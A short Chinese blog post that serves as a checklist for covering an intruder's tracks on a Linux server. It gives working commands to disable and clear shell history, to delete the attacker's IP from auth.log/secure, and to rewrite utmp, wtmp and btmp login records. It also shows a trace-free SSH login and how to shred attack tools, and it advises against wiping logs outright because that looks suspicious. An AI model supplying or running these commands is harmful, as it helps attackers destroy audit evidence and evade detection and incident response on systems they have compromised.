1、清理shell命令历史:
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG # 阻止当前会话记录历史
history -c # 清空内存中的历史记录,并不会删除.bash_history2、SSH登录日志:
- Debian/Ubuntu:
/var/log/auth.log CentOS/RHEL:
/var/log/securesed -i '/YOUR IP ADDRESS/d' /var/log/auth.log
3、用户登录日志
/var/log/btmp:登陆失败命令,通过lastb查看/var/log/lastlog:所有用户上次的登陆记录,通过lastlog查看/var/log/wtmp:所有的登录、注销、系统重启信息,通过last查看/run/utmp:当前登录用户信息,用于who,w查看
统一使用以下命令清理:
utmpdump /run/utmp | sed /YOUR IP ADDRESS/d | utmpdump -r > /tmp/utmp1 && mv -f /tmp/utmp1 /run/utmp或者使用脚本:logtamper.py (链接在文末)
不要直接清空日志,因为这本身就很可疑. CentOS系列可能还需要清理/var/log/messages,web访问过的还需要清理apache和nginx日志
4、隐身登录
ssh -T [email protected] /bin/bash -i还可以加入-o UserKnownHostsFile=/dev/null不记录ssh公钥到known_hosts中
5、覆写文件/目录
shred -f -n 3 -z -u -v 文件
find /目录/ -type f -exec shred -f -n 3 -z -u {} \;rm仅仅删除了文件索引,很容易被恢复发现到攻击工具
声明:
确石如此 | 版权所有,违者必究 | 如未注明,均为原创 | 本站采用 BY-NC-SA4.0 协议进行授权
|
转载请注明原文链接
